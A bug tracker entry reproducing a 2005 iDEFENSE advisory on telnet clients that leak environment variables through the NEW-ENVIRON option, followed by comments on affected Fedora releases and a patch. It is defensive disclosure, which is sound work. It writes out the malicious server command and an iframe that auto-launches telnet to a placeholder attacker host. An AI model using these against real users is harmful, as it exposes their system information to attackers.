+++ This bug was initially created as a clone of Bug #159304 +++ iDEFENSE Security Advisory XX.XX.05 http://www.idefense.com/application/poi/display?type=vulnerabilities MMM DD, 2005 I. BACKGROUND The TELNET protocol allows virtual network terminals to be connected to over the internet. The initial description of the telnet protocol was given in RFC854 in May 1983. Since then there have been many extra features added including encryption. II. DESCRIPTION Remote exploitation of an input validation error in multiple telnet clients could allow an attacker to gain sensitive information about the victim's system. The vulnerability specifically exists in the handling of the NEW-ENVIRON command. In order to exploit this vulnerability, a malicious server can send a connected client the following telnet command: SB NEW-ENVIRON SEND ENV_USERVAR <name of environment variable> SE Vulnerable telnet clients will send the contents of the reference environment variable, which may contain information useful to an attacker. The expected behaviour would be only to send environment variables related directly to the operation of the telnet client (for example, TERM), or those specifically allowed by the user. III. ANALYSIS Successful exploitation of the vulnerability would allow an attacker to read the values of arbitrary environment variables. By itself this vulnerability is not a large threat, but exploiting this vulnerability may give an attacker more information about a targetted system, which could allow more effective attacks. In order to exploit this vulnerability, an attacker would need to convince the user to connect to their malicious server. It may be possible to automatically launch the telnet command from a webpage, for example <html><body> <iframe src='telnet://malicious.server/'> </body> On opening this page the telnet client may be launched and attempt to connect to the host 'malicious.server'. IV. DETECTION iDEFENSE has confirmed the existance of the vulnerability in version 5.1.2600.2180 of the Microsoft Telnet Client, the telnet client included in the Kerberos V5 Release 1.3.6 package and the client included in the SUNWtnetc package of Solaris 5.9. It is suspected that most BSD based telnet clients are affected by this vulnerability. The telnet client from the netkit-telnet package distributed with all current versions of Redhat Linux contains a patch for this vulnerability, introduced in early 2000. Some other distributions may also contain this patch. There does not appear to be security advisory released at the time the patch was added, nor does there appear to be an entry in the Bugzilla database. This issue appears to have been mentioned in passing in RHSA-2000-028, in relation to a vulnerability in Netscape. V. WORKAROUND For Windows based platforms, disabling the Telnet handler or specifying a different application to handle Telnet URL's can mitigate URL based attacks. This can be accomplished by removing or modifying the following registry key: HKEY_CLASSES_ROOT\telnet\shell\open\command This workaround should prevent automatic explotation attempts. It does not fix the underlying issue. iDEFENSE is currently unaware of any workarounds for this issue for other affected platforms.
This issue also affects FC4
The OWL patch is attachment 115035 [details]
This is fixed in currently supported Fedora releases.